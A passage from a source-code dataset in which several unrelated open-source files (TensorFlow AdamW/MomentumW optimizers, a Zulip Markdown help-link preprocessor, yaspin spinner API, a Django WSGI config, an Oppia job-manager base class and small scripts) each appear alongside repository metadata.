"repo_name": "Samsung/ChromiumGStreamerBackend",
"id": "032e847303504674763be890e1955c764b2772e9",
"size": "37098",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tools/android/appstats.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import unittest
from quickbooks.objects.item import Item
class ItemTests(unittest.TestCase):
def test_unicode(self):
item = Item()
item.Name = "test"
        self.assertEqual(unicode(item), "test")
| {
"content_hash": "2d5b9c64df23f503fa013b80d61a7540",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 48,
"avg_line_length": 20.272727272727273,
"alnum_prop": 0.6636771300448431,
"repo_name": "ferdiaz/python-quickbooks",
"id": "841aa189e3c0c0f09e9a3e461f47d7faa00ef85c",
"size": "223",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/objects/test_item.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "164"
},
{
"name": "Python",
"bytes": "92199"
}
],
"symlink_target": ""
} |
"""Base class to make optimizers weight decay ready."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import adam
from tensorflow.python.training import momentum as momentum_opt
from tensorflow.python.training import optimizer
from tensorflow.python.util.tf_export import tf_export
class DecoupledWeightDecayExtension(object):
"""This class allows to extend optimizers with decoupled weight decay.
It implements the decoupled weight decay described by Loshchilov & Hutter
(https://arxiv.org/pdf/1711.05101.pdf), in which the weight decay is
  decoupled from the optimization steps w.r.t. the loss function.
For SGD variants, this simplifies hyperparameter search since it decouples
the settings of weight decay and learning rate.
For adaptive gradient algorithms, it regularizes variables with large
gradients more than L2 regularization would, which was shown to yield better
training loss and generalization error in the paper above.
This class alone is not an optimizer but rather extends existing
optimizers with decoupled weight decay. We explicitly define the two examples
used in the above paper (SGDW and AdamW), but in general this can extend
any OptimizerX by using
  `extend_with_decoupled_weight_decay(OptimizerX)`.
In order for it to work, it must be the first class the Optimizer with
weight decay inherits from, e.g.
```python
class AdamWOptimizer(DecoupledWeightDecayExtension, adam.AdamOptimizer):
def __init__(self, weight_decay, *args, **kwargs):
      super(AdamWOptimizer, self).__init__(weight_decay, *args, **kwargs)
```
Note that this extension decays weights BEFORE applying the update based
on the gradient, i.e. this extension only has the desired behaviour for
  optimizers which do not depend on the value of 'var' in the update step!
"""
def __init__(self, weight_decay, **kwargs):
"""Construct the extension class that adds weight decay to an optimizer.
Args:
weight_decay: A `Tensor` or a floating point value, the factor by which
a variable is decayed in the update step.
      **kwargs: Optional keyword arguments that are passed on to the
        constructor of the base optimizer.
"""
self._decay_var_list = None # is set in minimize or apply_gradients
self._weight_decay = weight_decay
# The tensors are initialized in call to _prepare
self._weight_decay_tensor = None
super(DecoupledWeightDecayExtension, self).__init__(**kwargs)
def minimize(self, loss, global_step=None, var_list=None,
gate_gradients=optimizer.Optimizer.GATE_OP,
aggregation_method=None, colocate_gradients_with_ops=False,
name=None, grad_loss=None, decay_var_list=None):
"""Add operations to minimize `loss` by updating `var_list` with decay.
    This function is the same as Optimizer.minimize except that it allows one
    to specify the variables that should be decayed using decay_var_list.
If decay_var_list is None, all variables in var_list are decayed.
For more information see the documentation of Optimizer.minimize.
Args:
loss: A `Tensor` containing the value to minimize.
global_step: Optional `Variable` to increment by one after the
variables have been updated.
var_list: Optional list or tuple of `Variable` objects to update to
minimize `loss`. Defaults to the list of variables collected in
the graph under the key `GraphKeys.TRAINABLE_VARIABLES`.
gate_gradients: How to gate the computation of gradients. Can be
`GATE_NONE`, `GATE_OP`, or `GATE_GRAPH`.
aggregation_method: Specifies the method used to combine gradient terms.
Valid values are defined in the class `AggregationMethod`.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
name: Optional name for the returned operation.
grad_loss: Optional. A `Tensor` holding the gradient computed for `loss`.
decay_var_list: Optional list of decay variables.
Returns:
An Operation that updates the variables in `var_list`. If `global_step`
was not `None`, that operation also increments `global_step`.
"""
self._decay_var_list = set(decay_var_list) if decay_var_list else False
return super(DecoupledWeightDecayExtension, self).minimize(
loss, global_step=global_step, var_list=var_list,
gate_gradients=gate_gradients, aggregation_method=aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops, name=name,
grad_loss=grad_loss)
def apply_gradients(self, grads_and_vars, global_step=None, name=None,
decay_var_list=None):
"""Apply gradients to variables and decay the variables.
This function is the same as Optimizer.apply_gradients except that it
    allows one to specify the variables that should be decayed using
decay_var_list. If decay_var_list is None, all variables in var_list
are decayed.
For more information see the documentation of Optimizer.apply_gradients.
Args:
grads_and_vars: List of (gradient, variable) pairs as returned by
`compute_gradients()`.
global_step: Optional `Variable` to increment by one after the
variables have been updated.
name: Optional name for the returned operation. Default to the
name passed to the `Optimizer` constructor.
decay_var_list: Optional list of decay variables.
Returns:
An `Operation` that applies the specified gradients. If `global_step`
was not None, that operation also increments `global_step`.
"""
self._decay_var_list = set(decay_var_list) if decay_var_list else False
return super(DecoupledWeightDecayExtension, self).apply_gradients(
grads_and_vars, global_step=global_step, name=name)
def _prepare(self):
weight_decay = self._weight_decay
if callable(weight_decay):
weight_decay = weight_decay()
self._weight_decay_tensor = ops.convert_to_tensor(
weight_decay, name="weight_decay")
# Call the optimizers _prepare function.
super(DecoupledWeightDecayExtension, self)._prepare()
def _decay_weights_op(self, var):
if not self._decay_var_list or var in self._decay_var_list:
return var.assign_sub(self._weight_decay * var, self._use_locking)
return control_flow_ops.no_op()
def _decay_weights_sparse_op(self, var, indices, scatter_add):
if not self._decay_var_list or var in self._decay_var_list:
return scatter_add(var, indices, -self._weight_decay * var,
self._use_locking)
return control_flow_ops.no_op()
# Here, we overwrite the apply functions that the base optimizer calls.
# super().apply_x resolves to the apply_x function of the BaseOptimizer.
def _apply_dense(self, grad, var):
with ops.control_dependencies([self._decay_weights_op(var)]):
return super(DecoupledWeightDecayExtension, self)._apply_dense(grad, var)
def _resource_apply_dense(self, grad, var):
with ops.control_dependencies([self._decay_weights_op(var)]):
return super(DecoupledWeightDecayExtension, self)._resource_apply_dense(
grad, var)
def _apply_sparse(self, grad, var):
scatter_add = state_ops.scatter_add
decay_op = self._decay_weights_sparse_op(var, grad.indices, scatter_add)
with ops.control_dependencies([decay_op]):
return super(DecoupledWeightDecayExtension, self)._apply_sparse(
grad, var)
def _resource_scatter_add(self, x, i, v, _=None):
# last argument allows for one overflow argument, to have the same function
# signature as state_ops.scatter_add
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_add(x.handle, i, v)]):
return x.value()
def _resource_apply_sparse(self, grad, var, indices):
scatter_add = self._resource_scatter_add
decay_op = self._decay_weights_sparse_op(var, indices, scatter_add)
with ops.control_dependencies([decay_op]):
return super(DecoupledWeightDecayExtension, self)._resource_apply_sparse(
grad, var, indices)
def extend_with_decoupled_weight_decay(base_optimizer):
"""Factory function returning an optimizer class with decoupled weight decay.
Returns an optimizer class. An instance of the returned class computes the
update step of `base_optimizer` and additionally decays the weights.
E.g., the class returned by
`extend_with_decoupled_weight_decay(tf.train.AdamOptimizer)` is equivalent to
`tf.contrib.opt.AdamWOptimizer`.
The API of the new optimizer class slightly differs from the API of the
base optimizer:
- The first argument to the constructor is the weight decay rate.
- `minimize` and `apply_gradients` accept the optional keyword argument
`decay_var_list`, which specifies the variables that should be decayed.
If `None`, all variables that are optimized are decayed.
Usage example:
```python
# MyAdamW is a new class
MyAdamW = extend_with_decoupled_weight_decay(tf.train.AdamOptimizer)
# Create a MyAdamW object
optimizer = MyAdamW(weight_decay=0.001, learning_rate=0.001)
  sess.run(optimizer.minimize(loss, decay_var_list=[var1, var2]))
  ```
  Note that this extension decays weights BEFORE applying the update based
  on the gradient, i.e. this extension only has the desired behaviour for
  optimizers which do not depend on the value of 'var' in the update step!
Args:
base_optimizer: An optimizer class that inherits from tf.train.Optimizer.
Returns:
A new optimizer class that inherits from DecoupledWeightDecayExtension
and base_optimizer.
"""
class OptimizerWithDecoupledWeightDecay(DecoupledWeightDecayExtension,
base_optimizer):
"""Base_optimizer with decoupled weight decay.
This class computes the update step of `base_optimizer` and
additionally decays the variable with the weight decay being decoupled from
    the optimization steps w.r.t. the loss function, as described by
Loshchilov & Hutter (https://arxiv.org/pdf/1711.05101.pdf).
For SGD variants, this simplifies hyperparameter search since
it decouples the settings of weight decay and learning rate.
For adaptive gradient algorithms, it regularizes variables with large
gradients more than L2 regularization would, which was shown to yield
better training loss and generalization error in the paper above.
"""
def __init__(self, weight_decay, *args, **kwargs):
# super delegation is necessary here
# pylint: disable=useless-super-delegation
super(OptimizerWithDecoupledWeightDecay, self).__init__(
weight_decay, *args, **kwargs)
# pylint: enable=useless-super-delegation
return OptimizerWithDecoupledWeightDecay
@tf_export("contrib.opt.MomentumWOptimizer")
class MomentumWOptimizer(DecoupledWeightDecayExtension,
momentum_opt.MomentumOptimizer):
"""Optimizer that implements the Momentum algorithm with weight_decay.
This is an implementation of the SGDW optimizer described in "Fixing
Weight Decay Regularization in Adam" by Loshchilov & Hutter
(https://arxiv.org/abs/1711.05101)
  ([pdf](https://arxiv.org/pdf/1711.05101.pdf)).
It computes the update step of `train.MomentumOptimizer` and additionally
decays the variable. Note that this is different from adding
L2 regularization on the variables to the loss. Decoupling the weight decay
from other hyperparameters (in particular the learning rate) simplifies
hyperparameter search.
For further information see the documentation of the Momentum Optimizer.
Note that this optimizer can also be instantiated as
```python
  extend_with_decoupled_weight_decay(tf.train.MomentumOptimizer)(
      weight_decay=weight_decay, ...)
```
"""
def __init__(self, weight_decay, learning_rate, momentum,
use_locking=False, name="MomentumW", use_nesterov=False):
"""Construct a new MomentumW optimizer.
For further information see the documentation of the Momentum Optimizer.
Args:
weight_decay: A `Tensor` or a floating point value. The weight decay.
learning_rate: A `Tensor` or a floating point value. The learning rate.
momentum: A `Tensor` or a floating point value. The momentum.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Momentum".
use_nesterov: If `True` use Nesterov Momentum.
See [Sutskever et al., 2013](
http://jmlr.org/proceedings/papers/v28/sutskever13.pdf).
This implementation always computes gradients at the value of the
variable(s) passed to the optimizer. Using Nesterov Momentum makes the
variable(s) track the values called `theta_t + mu*v_t` in the paper.
@compatibility(eager)
When eager execution is enabled, learning_rate, weight_decay and momentum
can each be a callable that takes no arguments and returns the actual value
to use. This can be useful for changing these values across different
invocations of optimizer functions.
@end_compatibility
"""
super(MomentumWOptimizer, self).__init__(
weight_decay, learning_rate=learning_rate, momentum=momentum,
use_locking=use_locking, name=name, use_nesterov=use_nesterov)
@tf_export("contrib.opt.AdamWOptimizer")
class AdamWOptimizer(DecoupledWeightDecayExtension, adam.AdamOptimizer):
"""Optimizer that implements the Adam algorithm with weight decay.
This is an implementation of the AdamW optimizer described in "Fixing
Weight Decay Regularization in Adam" by Loshchilov & Hutter
(https://arxiv.org/abs/1711.05101)
  ([pdf](https://arxiv.org/pdf/1711.05101.pdf)).
It computes the update step of `train.AdamOptimizer` and additionally decays
the variable. Note that this is different from adding L2 regularization on
the variables to the loss: it regularizes variables with large
gradients more than L2 regularization would, which was shown to yield better
training loss and generalization error in the paper above.
For further information see the documentation of the Adam Optimizer.
Note that this optimizer can also be instantiated as
```python
  extend_with_decoupled_weight_decay(tf.train.AdamOptimizer)(
      weight_decay=weight_decay, ...)
```
"""
def __init__(self, weight_decay, learning_rate=0.001, beta1=0.9, beta2=0.999,
epsilon=1e-8, use_locking=False, name="AdamW"):
"""Construct a new AdamW optimizer.
For further information see the documentation of the Adam Optimizer.
Args:
weight_decay: A `Tensor` or a floating point value. The weight decay.
learning_rate: A Tensor or a floating point value. The learning rate.
beta1: A float value or a constant float tensor.
The exponential decay rate for the 1st moment estimates.
beta2: A float value or a constant float tensor.
The exponential decay rate for the 2nd moment estimates.
epsilon: A small constant for numerical stability. This epsilon is
"epsilon hat" in the Kingma and Ba paper (in the formula just before
Section 2.1), not the epsilon in Algorithm 1 of the paper.
use_locking: If True use locks for update operations.
name: Optional name for the operations created when applying gradients.
Defaults to "Adam".
"""
super(AdamWOptimizer, self).__init__(
weight_decay, learning_rate=learning_rate, beta1=beta1, beta2=beta2,
epsilon=epsilon, use_locking=use_locking, name=name)
| {
"content_hash": "cbd75c599e864105b87d3c0b643be469",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 79,
"avg_line_length": 45.98847262247838,
"alnum_prop": 0.7224589547562351,
"repo_name": "ZhangXinNan/tensorflow",
"id": "b9cf40eb7b2d11c98b93c51213145ca4e2670318",
"size": "16648",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/opt/python/training/weight_decay_optimizers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1286"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "327005"
},
{
"name": "C#",
"bytes": "8215"
},
{
"name": "C++",
"bytes": "46648068"
},
{
"name": "CMake",
"bytes": "206720"
},
{
"name": "Dockerfile",
"bytes": "6978"
},
{
"name": "Go",
"bytes": "1210133"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "830576"
},
{
"name": "Jupyter Notebook",
"bytes": "2632421"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "51309"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40046802"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "455624"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
"""
WSGI config for source project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "source.settings")
application = get_wsgi_application()
| {
"content_hash": "0a48d0aa3ca264fb9eaf12fd8a049566",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.375,
"alnum_prop": 0.7692307692307693,
"repo_name": "toladata/TolaProfile",
"id": "a64d3153fbbf2f492cf038814ad2a7ea5c9c3f10",
"size": "390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "source/wsgi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "86675"
},
{
"name": "HTML",
"bytes": "51669"
},
{
"name": "JavaScript",
"bytes": "268806"
},
{
"name": "Python",
"bytes": "43126"
},
{
"name": "TypeScript",
"bytes": "93391"
}
],
"symlink_target": ""
} |
import re
import markdown
from typing import Any, Dict, List, Optional
from typing.re import Match
from markdown.preprocessors import Preprocessor
# There is a lot of duplicated code between this file and
# help_settings_links.py. So if you're making a change here consider making
# it there as well.
REGEXP = re.compile(r'\{relative\|(?P<link_type>.*?)\|(?P<key>.*?)\}')
gear_info = {
# The pattern is key: [name, link]
# key is from REGEXP: `{relative|gear|key}`
# name is what the item is called in the gear menu: `Select **name**.`
# link is used for relative links: `Select [name](link).`
'manage-streams': ['Manage streams', '/#streams/subscribed'],
'settings': ['Settings', '/#settings/your-account'],
'manage-organization': ['Manage organization', '/#organization/organization-profile'],
'integrations': ['Integrations', '/integrations'],
'stats': ['Statistics', '/stats'],
'plans': ['Plans and pricing', '/plans'],
'billing': ['Billing', '/billing'],
'invite': ['Invite users', '/#invite'],
}
gear_instructions = """
1. From your desktop, click on the **gear**
(<i class="fa fa-cog"></i>) in the upper right corner.
1. Select %(item)s.
"""
def gear_handle_match(key: str) -> str:
if relative_help_links:
item = '[%s](%s)' % (gear_info[key][0], gear_info[key][1])
else:
item = '**%s**' % (gear_info[key][0],)
return gear_instructions % {'item': item}
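# For example, '{relative|gear|settings}' expands to the gear instructions
# ending in 'Select [Settings](/#settings/your-account).' when
# relative_help_links is set, and in 'Select **Settings**.' otherwise.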
stream_info = {
'all': ['All streams', '/#streams/all'],
'subscribed': ['Your streams', '/#streams/subscribed'],
}
stream_instructions_no_link = """
1. From your desktop, click on the **gear**
(<i class="fa fa-cog"></i>) in the upper right corner.
1. Click **Manage streams**.
"""
def stream_handle_match(key: str) -> str:
if relative_help_links:
return "1. Go to [%s](%s)." % (stream_info[key][0], stream_info[key][1])
if key == 'all':
return stream_instructions_no_link + "\n\n1. Click **All streams** in the upper left."
return stream_instructions_no_link
LINK_TYPE_HANDLERS = {
'gear': gear_handle_match,
'stream': stream_handle_match,
}
class RelativeLinksHelpExtension(markdown.Extension):
def extendMarkdown(self, md: markdown.Markdown, md_globals: Dict[str, Any]) -> None:
""" Add RelativeLinksHelpExtension to the Markdown instance. """
md.registerExtension(self)
md.preprocessors.add('help_relative_links', RelativeLinks(), '_begin')
relative_help_links = None # type: Optional[bool]
def set_relative_help_links(value: bool) -> None:
global relative_help_links
relative_help_links = value
class RelativeLinks(Preprocessor):
def run(self, lines: List[str]) -> List[str]:
done = False
while not done:
            for loc, line in enumerate(lines):
match = REGEXP.search(line)
if match:
text = [self.handleMatch(match)]
# The line that contains the directive to include the macro
# may be preceded or followed by text or tags, in that case
# we need to make sure that any preceding or following text
# stays the same.
line_split = REGEXP.split(line, maxsplit=0)
preceding = line_split[0]
following = line_split[-1]
text = [preceding] + text + [following]
lines = lines[:loc] + text + lines[loc+1:]
break
else:
done = True
return lines
def handleMatch(self, match: Match[str]) -> str:
return LINK_TYPE_HANDLERS[match.group('link_type')](match.group('key'))
def makeExtension(*args: Any, **kwargs: Any) -> RelativeLinksHelpExtension:
return RelativeLinksHelpExtension(*args, **kwargs)
| {
"content_hash": "c94f93880aab00739b10ee3f6a3b78fd",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 94,
"avg_line_length": 35.925925925925924,
"alnum_prop": 0.6054123711340206,
"repo_name": "tommyip/zulip",
"id": "f13e411c1c81a07f1510158968a8ca35a500b423",
"size": "3880",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "zerver/lib/bugdown/help_relative_links.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "400301"
},
{
"name": "Dockerfile",
"bytes": "2939"
},
{
"name": "Emacs Lisp",
"bytes": "157"
},
{
"name": "HTML",
"bytes": "718599"
},
{
"name": "JavaScript",
"bytes": "3092201"
},
{
"name": "Perl",
"bytes": "398763"
},
{
"name": "Puppet",
"bytes": "71123"
},
{
"name": "Python",
"bytes": "6889539"
},
{
"name": "Ruby",
"bytes": "6110"
},
{
"name": "Shell",
"bytes": "119898"
},
{
"name": "TypeScript",
"bytes": "14645"
}
],
"symlink_target": ""
} |
"""
yaspin.api
~~~~~~~~~~
This module implements the Yaspin API.
"""
import signal
from .core import Yaspin
from .signal_handlers import default_handler
def yaspin(*args, **kwargs):
"""Display spinner in stdout.
Can be used as a context manager or as a function decorator.
Arguments:
spinner (base_spinner.Spinner, optional): Spinner object to use.
text (str, optional): Text to show along with spinner.
color (str, optional): Spinner color.
on_color (str, optional): Color highlight for the spinner.
attrs (list, optional): Color attributes for the spinner.
reversal (bool, optional): Reverse spin direction.
side (str, optional): Place spinner to the right or left end
of the text string.
sigmap (dict, optional): Maps POSIX signals to their respective
handlers.
Returns:
core.Yaspin: instance of the Yaspin class.
Raises:
ValueError: If unsupported ``color`` is specified.
ValueError: If unsupported ``on_color`` is specified.
ValueError: If unsupported color attribute in ``attrs``
is specified.
ValueError: If trying to register handler for SIGKILL signal.
ValueError: If unsupported ``side`` is specified.
Available text colors:
red, green, yellow, blue, magenta, cyan, white.
Available text highlights:
on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan,
on_white, on_grey.
Available attributes:
bold, dark, underline, blink, reverse, concealed.
Example::
# Use as a context manager
with yaspin():
some_operations()
# Context manager with text
with yaspin(text="Processing..."):
some_operations()
# Context manager with custom sequence
with yaspin(Spinner('-\\|/', 150)):
some_operations()
# As decorator
@yaspin(text="Loading...")
def foo():
time.sleep(5)
foo()
"""
return Yaspin(*args, **kwargs)
def kbi_safe_yaspin(*args, **kwargs):
kwargs["sigmap"] = {signal.SIGINT: default_handler}
return Yaspin(*args, **kwargs)
# Handle PYTHONOPTIMIZE=2 case, when docstrings are set to None.
if yaspin.__doc__:
_kbi_safe_doc = yaspin.__doc__.replace("yaspin", "kbi_safe_yaspin")
kbi_safe_yaspin.__doc__ = _kbi_safe_doc
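# A minimal usage sketch (not part of the original module): kbi_safe_yaspin is
# a drop-in replacement for yaspin that maps SIGINT to the default handler, so
# Ctrl-C stops the spinner cleanly instead of leaving the terminal in a messy
# state.
#
#   with kbi_safe_yaspin(text="Downloading..."):
#       fetch_files()  # hypothetical long-running call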
| {
"content_hash": "325ab8135d39f3a7490aa1b62f55b7fb",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 72,
"avg_line_length": 28.423529411764704,
"alnum_prop": 0.6216887417218543,
"repo_name": "kennethreitz/pipenv",
"id": "3e0c22ef91694068a0f5a91cc529360692ce1468",
"size": "2533",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pipenv/vendor/yaspin/api.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "202"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "2588085"
},
{
"name": "Roff",
"bytes": "40754"
}
],
"symlink_target": ""
} |
import lib.clusters as clusters
import sys
argvs = sys.argv
argc = len(argvs)
# If no argument is given, print usage and exit.
if (argc < 2):
print 'Usage: # python %s path_to_blogdata.txt' % argvs[0]
quit()
input_file_path = argvs[1]
output_file_path = 'draw2d.result.jpg'
# Main part starts here.
blognames,words,data = clusters.read_file(input_file_path)
coords = clusters.scale_down(data)
clusters.draw2d(coords, blognames, jpeg=output_file_path)
| {
"content_hash": "3f093d9687f7443ba69062e19de515e0",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 60,
"avg_line_length": 21.3,
"alnum_prop": 0.7323943661971831,
"repo_name": "saxsir/hhlab2013s-js-a",
"id": "336c2e144b0d6907570221a4bb6597f41bf2bf21",
"size": "507",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/python/chapter3/draw2d_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1912"
},
{
"name": "JavaScript",
"bytes": "98483"
},
{
"name": "Python",
"bytes": "177547"
}
],
"symlink_target": ""
} |
"""Common classes and methods for managing long running jobs."""
__author__ = 'Sean Lip'
import ast
import copy
import datetime
import logging
import traceback
import utils
from core.platform import models
(base_models, job_models,) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.job])
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
from google.appengine.ext import ndb
from mapreduce import base_handler
from mapreduce import context
from mapreduce import input_readers
from mapreduce import mapreduce_pipeline
from mapreduce import model as mapreduce_model
from mapreduce.lib.pipeline import pipeline
from mapreduce import util as mapreduce_util
MAPPER_PARAM_KEY_ENTITY_KINDS = 'entity_kinds'
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS = 'queued_time_msecs'
# Name of an additional parameter to pass into the MR job for cleaning up
# old auxiliary job models.
MAPPER_PARAM_MAX_START_TIME_MSEC = 'max_start_time_msec'
STATUS_CODE_NEW = job_models.STATUS_CODE_NEW
STATUS_CODE_QUEUED = job_models.STATUS_CODE_QUEUED
STATUS_CODE_STARTED = job_models.STATUS_CODE_STARTED
STATUS_CODE_COMPLETED = job_models.STATUS_CODE_COMPLETED
STATUS_CODE_FAILED = job_models.STATUS_CODE_FAILED
STATUS_CODE_CANCELED = job_models.STATUS_CODE_CANCELED
VALID_STATUS_CODE_TRANSITIONS = {
STATUS_CODE_NEW: [STATUS_CODE_QUEUED],
STATUS_CODE_QUEUED: [STATUS_CODE_STARTED, STATUS_CODE_CANCELED],
STATUS_CODE_STARTED: [
STATUS_CODE_COMPLETED, STATUS_CODE_FAILED, STATUS_CODE_CANCELED],
STATUS_CODE_COMPLETED: [],
STATUS_CODE_FAILED: [],
STATUS_CODE_CANCELED: [],
}
# The default amount of time that defines a 'recent' job. Jobs that were
# queued more recently than this number of milliseconds ago are considered
# 'recent'.
DEFAULT_RECENCY_MSEC = 14 * 24 * 60 * 60 * 1000
# The maximum number of previously-run jobs to show in the admin dashboard.
NUM_JOBS_IN_DASHBOARD_LIMIT = 100
class BaseJobManager(object):
"""Base class for managing long-running jobs.
These jobs are not transaction-safe, and multiple jobs of the same kind
may run at once and overlap. Individual jobs should account for this. In
particular, if a job writes to some location, no other enqueued or running
job should be writing to, or reading from, that location.
This is expected to be the case for one-off migration jobs, as well as
batch reporting jobs. One-off migration jobs are expected to be transient
and will not be a permanent part of the codebase. Batch reporting jobs are
expected to write to a particular datastore model that is optimized for
fast querying; each batch reporting job should correspond to exactly one of
these models. The reporting jobs are expected to be run as MapReduces; to
find existing ones, search for subclasses of BaseMapReduceJobManager.
Note that the enqueue(), register_start(), register_completion(),
register_failure() and cancel() methods in this class batch the following
operations: (a) pre- and post-hooks, (b) updating the status of the job in
the datastore, and (c) actually performing the operation. Each entire batch
is not run in a transaction, but subclasses can still perform (a) or (c)
transactionally if they wish to.
"""
@classmethod
def _is_abstract(cls):
return cls in ABSTRACT_BASE_CLASSES
@classmethod
def create_new(cls):
"""Creates a new job of this class type. Returns the id of this job."""
if cls._is_abstract():
raise Exception(
'Tried to directly create a job using the abstract base '
'manager class %s, which is not allowed.' % cls.__name__)
def _create_new_job():
job_id = job_models.JobModel.get_new_id(cls.__name__)
job_models.JobModel(id=job_id, job_type=cls.__name__).put()
return job_id
return transaction_services.run_in_transaction(_create_new_job)
@classmethod
def enqueue(cls, job_id, additional_job_params=None):
"""Marks a job as queued and adds it to a queue for processing."""
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_QUEUED)
cls._require_correct_job_type(model.job_type)
# Enqueue the job.
cls._pre_enqueue_hook(job_id)
cls._real_enqueue(job_id, additional_job_params)
model.status_code = STATUS_CODE_QUEUED
model.time_queued_msec = utils.get_current_time_in_millisecs()
model.put()
cls._post_enqueue_hook(job_id)
@classmethod
def register_start(cls, job_id, metadata=None):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_STARTED)
cls._require_correct_job_type(model.job_type)
cls._pre_start_hook(job_id)
model.metadata = metadata
model.status_code = STATUS_CODE_STARTED
model.time_started_msec = utils.get_current_time_in_millisecs()
model.put()
cls._post_start_hook(job_id)
@classmethod
def register_completion(cls, job_id, output):
"""Marks a job as completed."""
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_COMPLETED)
cls._require_correct_job_type(model.job_type)
model.status_code = STATUS_CODE_COMPLETED
model.time_finished_msec = utils.get_current_time_in_millisecs()
model.output = output
model.put()
cls._post_completed_hook(job_id)
@classmethod
def register_failure(cls, job_id, error):
"""Marks a job as failed."""
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_FAILED)
cls._require_correct_job_type(model.job_type)
model.status_code = STATUS_CODE_FAILED
model.time_finished_msec = utils.get_current_time_in_millisecs()
model.error = error
model.put()
cls._post_failure_hook(job_id)
@classmethod
def cancel(cls, job_id, user_id):
# Ensure that preconditions are met.
model = job_models.JobModel.get(job_id, strict=True)
cls._require_valid_transition(
job_id, model.status_code, STATUS_CODE_CANCELED)
cls._require_correct_job_type(model.job_type)
cancel_message = 'Canceled by %s' % (user_id or 'system')
# Cancel the job.
cls._pre_cancel_hook(job_id, cancel_message)
model.status_code = STATUS_CODE_CANCELED
model.time_finished_msec = utils.get_current_time_in_millisecs()
model.error = cancel_message
model.put()
cls._post_cancel_hook(job_id, cancel_message)
@classmethod
def is_active(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.status_code in [STATUS_CODE_QUEUED, STATUS_CODE_STARTED]
@classmethod
def has_finished(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.status_code in [STATUS_CODE_COMPLETED, STATUS_CODE_FAILED]
@classmethod
def cancel_all_unfinished_jobs(cls, user_id):
"""Cancel all queued or started jobs of this job type."""
unfinished_job_models = job_models.JobModel.get_unfinished_jobs(
cls.__name__)
for model in unfinished_job_models:
cls.cancel(model.id, user_id)
@classmethod
def _real_enqueue(cls, job_id, additional_job_params):
"""Does the actual work of enqueueing a job for deferred execution.
Must be implemented by subclasses.
"""
raise NotImplementedError(
'Subclasses of BaseJobManager should implement _real_enqueue().')
@classmethod
def get_status_code(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.status_code
@classmethod
def get_time_queued_msec(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.time_queued_msec
@classmethod
def get_time_started_msec(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.time_started_msec
@classmethod
def get_time_finished_msec(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.time_finished_msec
@classmethod
